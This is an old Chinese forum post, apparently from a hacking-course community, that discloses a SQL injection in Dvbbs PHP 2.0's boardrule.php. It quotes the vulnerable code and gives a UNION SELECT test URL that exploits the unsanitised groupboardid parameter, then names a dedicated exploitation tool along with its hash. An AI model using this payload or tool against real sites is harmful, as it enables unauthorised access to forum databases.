找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 891|回复: 0

3月24日课程漏洞利用Dvbbs PHP 0day

[复制链接]

739

主题

468

回帖

4307

牛毛

论坛管理员

狼群

积分
4347
发表于 2008-3-24 17:45:28 | 显示全部楼层 |阅读模式
影响版本:2.0
漏洞文件:/boardrule.php
相关代码:
function brule() {
  global $dv,$db,$boardid,$lang,$groupboardid;
  $groupboardid=$_GET['groupboardid'];
  if(!empty($_GET['groupboardid'])){
    $rules=$db->scalar(\"select rules from {$dv}group_board where id={$groupboardid}\");
  }
  else{
    $rules=$db->scalar(\"select rules from {$dv}board where boardid={$boardid}\");
  }
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试:http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*
利用工具 dvbbs_php2.0_**er_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-27 07:00 , Processed in 0.117484 second(s), 23 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表